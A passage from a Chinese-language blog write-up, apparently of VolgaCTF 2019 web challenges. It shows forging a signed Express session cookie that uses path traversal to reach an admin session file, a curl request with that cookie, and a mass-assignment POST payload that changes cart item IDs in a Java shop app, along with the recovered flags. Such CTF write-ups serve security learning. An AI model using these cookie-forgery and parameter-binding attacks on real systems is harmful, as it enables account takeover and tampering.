<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">setcookie</span>(<span class="params">res, name, val, secret, options</span>) </span>&#123;</span><br><span class="line">  <span class="keyword">var</span> signed = <span class="string">'s:'</span> + signature.sign(val, secret);</span><br><span class="line">  <span class="keyword">var</span> data = cookie.serialize(name, signed, options);</span><br><span class="line"></span><br><span class="line">  <span class="comment">// sign my payload</span></span><br><span class="line">  <span class="keyword">var</span> signed2 = <span class="string">'s:'</span> + signature.sign(<span class="string">"../../volga_adminpanel/sessions/euzb7bMKx-5F29b2xNobGTDoWXmVFlEM.json"</span>, secret);</span><br><span class="line">  <span class="keyword">var</span> data2 = cookie.serialize(name, signed2, options);</span><br><span class="line">  <span class="built_in">console</span>.log(data2)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">  debug(<span class="string">'set-cookie %s'</span>, data);</span><br><span class="line"></span><br><span class="line">  <span class="keyword">var</span> prev = res.getHeader(<span class="string">'set-cookie'</span>) || [];</span><br><span class="line">  <span class="keyword">var</span> header = <span class="built_in">Array</span>.isArray(prev) ? prev.concat(data) : [prev, data];</span><br><span class="line"></span><br><span class="line">  res.setHeader(<span class="string">'set-cookie'</span>, header)</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>index.js中增加</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">app.get(<span class="string">`<span class="subst">$&#123;config.apiPrefix&#125;</span>/payload`</span>,<span class="function"><span class="keyword">function</span> (<span class="params">req, res</span>)</span>&#123;</span><br><span class="line">  req.session.test=<span class="string">"test"</span>;</span><br><span class="line">  res.end(<span class="string">"OK"</span>);</span><br><span class="line">&#125;);</span><br></pre></td></tr></table></figure>
<p>config.js</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">whitelistPaths: [</span><br><span class="line">  <span class="string">'/api/login'</span>, <span class="string">'/api/logout'</span>,<span class="string">'/api/payload'</span></span><br><span class="line">]</span><br></pre></td></tr></table></figure>
<p>之后本地启动并访问 <img src="https://i.loli.net/2019/04/03/5ca43ff56b20d.png" alt="655D3C99-58E0-4B98-A334-AF401BD9C7A8.png"> 得到</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">s%3A..%2F..%2Fvolga_adminpanel%2Fsessions%2Feuzb7bMKx-5F29b2xNobGTDoWXmVFlEM.KrY7Bi6sZtBB%2FJ4sPnVj5QkDEuBu%2F0QelFQQqAV6yh4</span><br></pre></td></tr></table></figure>
<p>之后设置cookie字段进行提交即可得到flag</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">curl -i http://gallery.q.2019.volgactf.ru/api/flag --cookie &quot;SESSION=s%3A..%2F..%2Fvolga_adminpanel%2Fsessions%2Feuzb7bMKx-5F29b2xNobGTDoWXmVFlEM.KrY7Bi6sZtBB%2FJ4sPnVj5QkDEuBu%2F0QelFQQqAV6yh4&quot; -L</span><br></pre></td></tr></table></figure>
<p><img src="https://i.loli.net/2019/04/03/5ca440109c090.png" alt="63B08906-2188-472C-AC0C-4FB2634C838E.png"></p>
<p> flag</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">VolgaCTF&#123;31c2ac53d4101a01264775328797d424&#125;</span><br></pre></td></tr></table></figure>
<h2 id="0x04-Blog"><a href="#0x04-Blog" class="headerlink" title="0x04 Blog"></a>0x04 Blog</h2><h2 id="0x05-Shop-V-2"><a href="#0x05-Shop-V-2" class="headerlink" title="0x05 Shop V.2"></a>0x05 Shop V.2</h2><ol>
<li>信息泄露 robots.txt-&gt;shop.1.0.1.war</li>
<li>代码审计 这个版本在buy路由处已经修复了1.0.0版本的自动绑定漏洞，但是在profile是存在的，并且可以控制一些变量，此版本我们可以看到user类中多了对cart的处理，所以考虑使用cart来完成。</li>
</ol>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">public</span> List&lt;Product&gt; <span class="title">getCartItems</span><span class="params">()</span> </span>&#123;</span><br><span class="line">    <span class="keyword">return</span> <span class="keyword">this</span>.cart;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">public</span> <span class="keyword">void</span> <span class="title">setCartItems</span><span class="params">(List&lt;Product&gt; cart)</span> </span>&#123;</span><br><span class="line">    <span class="keyword">this</span>.cart = cart;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>我们继续在controller中看下id是被使用做判断product的id的，那么很明显了，我们只要修改一下id就好</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">@RequestMapping</span>(&#123;<span class="string">"/profile"</span>&#125;)</span><br><span class="line"><span class="function"><span class="keyword">public</span> String <span class="title">profile</span><span class="params">(@ModelAttribute(<span class="string">"user"</span>)</span> User user, Model templateModel, HttpServletRequest request) </span>&#123;</span><br><span class="line">    HttpSession session = request.getSession();</span><br><span class="line">    <span class="keyword">if</span> (session.getAttribute(<span class="string">"user_id"</span>) == <span class="keyword">null</span>) &#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="string">"redirect:index"</span>;</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        List&lt;Product&gt; cart = <span class="keyword">new</span> ArrayList();</span><br><span class="line">        user.getCartItems().forEach((p) -&gt; &#123;</span><br><span class="line">            cart.add(<span class="keyword">this</span>.productDao.geProduct(p.getId()));</span><br><span class="line">        &#125;);</span><br><span class="line">        templateModel.addAttribute(<span class="string">"cart"</span>, cart);</span><br><span class="line">        <span class="keyword">return</span> <span class="string">"profile"</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>payload</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">POST /profile HTTP/1.1</span><br><span class="line">Host: shop2.q.2019.volgactf.ru</span><br><span class="line">User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:66.0) Gecko/20100101 Firefox/66.0</span><br><span class="line">Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8</span><br><span class="line">Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2</span><br><span class="line">Accept-Encoding: gzip, deflate</span><br><span class="line">Referer: http://shop2.q.2019.volgactf.ru/index</span><br><span class="line">Content-Type: application/x-www-form-urlencoded</span><br><span class="line">Content-Length: 30</span><br><span class="line">Connection: close</span><br><span class="line">Cookie: JSESSIONID=C77EBD253171F45F0E5F18DC4AB68B57</span><br><span class="line">Upgrade-Insecure-Requests: 1</span><br><span class="line"></span><br><span class="line">name=zeroyu&amp;CartItems[0].id=4</span><br></pre></td></tr></table></figure>
<p>flag</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">VolgaCTF&#123;e86007271413cc1ac563c6eca0e12b62&#125;</span><br></pre></td></tr></table></figure>
  </div>
</article>

    <div class="blog-post-comments">
        <div id="disqus_thread">
            <noscript>Please enable JavaScript to view the comments.</noscript>
        </div>
    </div>


    </div>
    
      <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/About/">About</a></li>
         
          <li><a href="/archives/">Writing</a></li>
         
          <li><a href="https://github.com/zer0yu">Projects</a></li>
        
      </ul>
    </div>

    <div id="toc-footer" style="display: none">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#0x00-前言"><span class="toc-number">1.</span> <span class="toc-text">0x00 前言</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x01-shop"><span class="toc-number">2.</span> <span class="toc-text">0x01 shop</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x02-HeadHunter"><span class="toc-number">3.</span> <span class="toc-text">0x02 HeadHunter</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x03-Gallery"><span class="toc-number">4.</span> <span class="toc-text">0x03 Gallery</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x04-Blog"><span class="toc-number">5.</span> <span class="toc-text">0x04 Blog</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x05-Shop-V-2"><span class="toc-number">6.</span> <span class="toc-text">0x05 Shop V.2</span></a></li></ol>
    </div>

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" href="http://www.facebook.com/sharer.php?u=http://zer0yu.github.io/2019/04/03/VolgaCTF-2019-Qualifier-Web/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://twitter.com/share?url=http://zer0yu.github.io/2019/04/03/VolgaCTF-2019-Qualifier-Web/&text=VolgaCTF 2019 Qualifier Web"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.linkedin.com/shareArticle?url=http://zer0yu.github.io/2019/04/03/VolgaCTF-2019-Qualifier-Web/&title=VolgaCTF 2019 Qualifier Web"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://pinterest.com/pin/create/bookmarklet/?url=http://zer0yu.github.io/2019/04/03/VolgaCTF-2019-Qualifier-Web/&is_video=false&description=VolgaCTF 2019 Qualifier Web"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=VolgaCTF 2019 Qualifier Web&body=Check out this article: http://zer0yu.github.io/2019/04/03/VolgaCTF-2019-Qualifier-Web/"><i class="fas fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://getpocket.com/save?url=http://zer0yu.github.io/2019/04/03/VolgaCTF-2019-Qualifier-Web/&title=VolgaCTF 2019 Qualifier Web"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://reddit.com/submit?url=http://zer0yu.github.io/2019/04/03/VolgaCTF-2019-Qualifier-Web/&title=VolgaCTF 2019 Qualifier Web"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.stumbleupon.com/submit?url=http://zer0yu.github.io/2019/04/03/VolgaCTF-2019-Qualifier-Web/&title=VolgaCTF 2019 Qualifier Web"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://digg.com/submit?url=http://zer0yu.github.io/2019/04/03/VolgaCTF-2019-Qualifier-Web/&title=VolgaCTF 2019 Qualifier Web"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.tumblr.com/share/link?url=http://zer0yu.github.io/2019/04/03/VolgaCTF-2019-Qualifier-Web/&name=VolgaCTF 2019 Qualifier Web&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fas fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fas fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fas fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

    
    <footer id="footer">
  <div class="footer-left">
    Copyright &copy; 2019 z3r0yu
  </div>
  <div class="footer-right">
    <nav>
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/About/">About</a></li>
         
          <li><a href="/archives/">Writing</a></li>
         
          <li><a href="https://github.com/zer0yu">Projects</a></li>
        
      </ul>
    </nav>
  </div>
</footer>

</body>
</html>
<!-- styles -->
<link rel="stylesheet" href="/lib/font-awesome/css/fontawesome-all.min.css">
<link rel="stylesheet" href="/lib/justified-gallery/css/justifiedGallery.min.css">

<!-- jquery -->
<script src="/lib/jquery/jquery.min.js"></script>
<script src="/lib/justified-gallery/js/jquery.justifiedGallery.min.js"></script>
<script src="/js/main.js"></script>
<!-- search -->

<!-- Google Analytics -->

    <script type="text/javascript">
        (function(i,s,o,g,r,a,m) {i['GoogleAnalyticsObject']=r;i[r]=i[r]||function() {
        (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
        m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
        })(window,document,'script','//www.google-analytics.com/analytics.js','ga');
        ga('create', 'UA-129276044-1', 'auto');
        ga('send', 'pageview');
    </script>

<!-- Baidu Analytics -->

    <script type="text/javascript">
        var _hmt = _hmt || [];
        (function() {
            var hm = document.createElement("script");
            hm.src = "https://hm.baidu.com/hm.js?8415e69cf54ba93c9ddb2eb597859c7d";
            var s = document.getElementsByTagName("script")[0];
            s.parentNode.insertBefore(hm, s);
        })();
    </script>

<!-- Disqus Comments -->

    <script type="text/javascript">
        var disqus_shortname = 'z3r0yu';

        (function(){
            var dsq = document.createElement('script');
            dsq.type = 'text/javascript';
            dsq.async = true;
            dsq.src = '//' + disqus_shortname + '.disqus.com/embed.js';
            (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq);
        }());
    </script>


